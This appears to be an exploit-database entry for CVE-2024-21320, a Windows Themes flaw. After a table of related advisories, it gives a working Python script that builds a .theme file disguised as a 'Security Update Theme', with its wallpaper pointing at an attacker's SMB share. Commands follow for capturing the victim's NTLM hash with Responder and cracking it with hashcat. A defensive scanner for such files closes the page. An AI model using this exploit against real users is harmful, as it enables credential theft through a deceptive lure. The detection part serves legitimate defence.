| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-21320 | 19 Jan 2024 17:29 | – | circl |
| Microsoft Windows Themes Security Vulnerability | 9 Jan 2024 00:00 | – | cnnvd |
| CVE-2024-21320 | 9 Jan 2024 17:57 | – | cve |
| CVE-2024-21320 Windows Themes Spoofing Vulnerability | 9 Jan 2024 17:57 | – | cvelist |
| January 9, 2024—KB5034119 (OS Build 14393.6614) - EXPIRED | 22 Mar 2024 07:00 | – | mskb |
| January 9, 2024—KB5034121 (OS Build 22000.2713) | 9 Jan 2024 08:00 | – | mskb |
| January 9, 2024—KB5034122 (OS Builds 19044.3930 and 19045.3930) - EXPIRED | 9 Jan 2024 08:00 | – | mskb |
| January 9, 2024—KB5034123 (OS Builds 22621.3007 and 22631.3007) | 9 Jan 2024 08:00 | – | mskb |
| January 9, 2024—KB5034127 (OS Build 17763.5329) - EXPIRED | 9 Jan 2024 08:00 | – | mskb |
| January 9, 2024—KB5034129 (OS Build 20348.2227) | 9 Jan 2024 08:00 | – | mskb |
# Exploit Title: CVE-2024-21320 - NTLM Hash Leak via Malicious Windows Theme
# Date: 02/03/2025
# Exploit Author: Abinesh Kamal K U
# CVE : CVE-2024-21320
# Ref: https://www.cve.org/CVERecord?id=CVE-2024-21320
## Step 1: Install Responder
Responder is a tool that runs a rogue SMB server to capture the NTLM (NetNTLMv2) authentication hashes a Windows client sends when it connects to it.
```bash
git clone https://github.com/lgandx/Responder.git
cd Responder
```
When you run Responder in Step 3, replace `eth0` with your network interface.
## Step 2: Create a Malicious Windows Theme File
### Python Script to Generate the Malicious `.theme` File
```python
import os

# Attacker-controlled SMB server IP
attacker_smb_server = "192.168.1.100"  # Change this to your attacker's IP

# Name of the malicious theme file
theme_filename = "malicious.theme"

# Malicious .theme file content (backslashes are doubled so the f-string
# emits single backslashes into the file)
theme_content = f"""
[Theme]
DisplayName=Security Update Theme
[Control Panel\\Desktop]
Wallpaper=\\\\{attacker_smb_server}\\share\\malicious.jpg
[VisualStyles]
Path=%SystemRoot%\\resources\\Themes\\Aero\\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Write the theme file
with open(theme_filename, "w") as theme_file:
    theme_file.write(theme_content)
print(f"[+] Malicious theme file '{theme_filename}' created.")

# Optional: Start a Python HTTP server to serve the malicious theme file
start_http = input("Start HTTP server to deliver theme file? (y/n): ").strip().lower()
if start_http == "y":
    print("[+] Starting HTTP server on port 8080...")
    os.system("python3 -m http.server 8080")
```
## Step 3: Deliver & Capture NTLM Hashes
1. Send the `malicious.theme` file to the target.
2. Run Responder to capture the NTLM hash:
   ```bash
   sudo python3 Responder.py -I eth0
   ```
3. Wait for the victim to open the `.theme` file.
4. Extract the NTLM hash from the Responder logs and crack it using hashcat:
   ```bash
   hashcat -m 5600 captured_hashes.txt rockyou.txt
   ```
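On the defensive side, the trigger in this advisory is a `.theme` value that points at a UNC share, so a mail gateway or endpoint scanner can flag such files before a user opens them. The following scanner is an added example, not part of the original advisory; `ATTACKER_HOST` and the sample theme text are constructed placeholders, and `is_suspicious`/`find_remote_references` are names chosen here.

```python
import configparser
import re

# A value is "remote" when it is a UNC path (\\host\share\... or //host/share/...)
# or carries an explicit remote URL scheme.
REMOTE_RE = re.compile(r"^(\\\\|//)[^\\/]+[\\/]|^(file|https?|smb)://", re.IGNORECASE)


def find_remote_references(theme_text):
    """Return (section, key, value) for every value in a .theme that points off-host."""
    parser = configparser.ConfigParser(
        interpolation=None,   # '%SystemRoot%' would otherwise be read as a '%' interpolation token
        strict=False,         # tolerate duplicate keys, which real theme files contain
        allow_no_value=True,  # tolerate lines without '='
        delimiters=("=",),
    )
    parser.optionxform = str  # keep key case for reporting
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        # Every key is checked, not only Wallpaper: a UNC value anywhere in a theme
        # is reason enough to block the file before a user double-clicks it.
        for key, value in parser.items(section):
            if value and REMOTE_RE.match(value.strip()):
                hits.append((section, key, value.strip()))
    return hits


def is_suspicious(theme_text):
    return bool(find_remote_references(theme_text))

# Constructed sample in the layout of the theme from this advisory; ATTACKER_HOST is a
# placeholder. Windows often writes .theme files as UTF-16: decode with 'utf-16' or
# 'utf-8-sig' before passing the text here.
SAMPLE_THEME = r"""
[Theme]
DisplayName=Security Update Theme

[Control Panel\Desktop]
Wallpaper=\\ATTACKER_HOST\share\malicious.jpg

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

if __name__ == "__main__":
    for section, key, value in find_remote_references(SAMPLE_THEME):
        print(f"[!] remote reference in [{section}] {key}={value}")
```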
--
Abinesh Kamal K U
abineshjerry.info
MTech - Cyber Security Systems & Networks
Amrita University